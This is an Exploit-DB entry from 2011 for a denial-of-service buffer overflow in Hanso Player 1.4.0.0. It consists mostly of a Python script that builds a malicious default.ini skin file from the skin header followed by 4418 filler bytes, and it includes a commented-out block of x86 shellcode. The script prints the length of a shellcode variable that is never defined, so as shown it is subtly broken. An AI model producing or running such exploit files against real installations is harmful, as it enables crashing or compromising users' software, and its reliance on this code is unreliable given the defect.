Hanso Player 1.4.0.0 - 'Skinfile' Buffer Overflow (Denial of Service)

EDB-ID:

16120

CVE:

N/A


Author:

badc0re

Type:

dos


Platform:

Windows

Date:

2011-02-06


# Exploit Title: Hanso Player 1.4.0.0 Buffer Overflow - DoS Skinfile
# Date: 05.02.2011
# Author: Dame Jovanoski(badc0re)
# Software Link: http://www.hansotools.com/downloads/hanso-player-setup.exe
# Version: 1.4.0.0
# Tested on: XP sp3


from struct import *
import time
f=open("default.ini","w")
#shell=("\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61"
#       "\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13"
#       "\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f"
#       "\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b"
#       "\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30"
#       "\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72"
#       "\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd"
#       "\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e"
#       "\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52"
#       "\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56");
print "Creating expoit."
time.sleep(1)
print "Creating explot.."
time.sleep(1)
print "Creating explot..."
junk="\x41"*4418
print "Your shellcode size is:",len(shell)
head=("\x5B\x48\x61\x6E\x73\x6F\x20\x50"
      "\x6C\x61\x79\x65\x72\x20\x53\x6B"
      "\x69\x6E\x5D\x0A")
try:    
    f.write(head+junk)  
    f.close()
    print "File created"
except:
    print "File cannot be created"